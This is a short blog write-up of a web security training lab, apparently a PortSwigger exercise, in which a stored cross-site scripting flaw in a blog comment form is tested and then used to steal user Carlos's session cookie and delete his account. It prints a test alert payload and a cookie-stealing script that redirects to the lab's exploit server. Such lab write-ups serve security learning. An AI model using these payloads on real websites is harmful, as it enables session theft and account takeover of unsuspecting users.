Notice: _load_textdomain_just_in_time işlevi yanlış çağrıldı. Translation loading for the perfect-portfolio domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Ayrıntılı bilgi almak için lütfen WordPress hata ayıklama bölümüne bakın. (Bu ileti 6.7.0 sürümünde eklendi.) in /home/margheri/public_html/wp-includes/functions.php on line 6121
Writeup: Offline password cracking - Aleyna Doğan

Writeup: Offline password cracking

Lab link.

We see that our lab description contains XSS. At first, we look at the cookie value used in the system.

We find a forum on the blog page to organize our XSS attack. Here we first try a basic XSS payload to see if it is XSS.

<script>alert(1);</script>

We have found our XSS vulnerability in the system, now we will pull the cookie value using our exploit server given to us in the lab, our payload we will use for this:

<script>document.location=‘exploit-server-URL’+document.cookie</script>

We access the cookies of the user Carlos and enter and delete the account.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir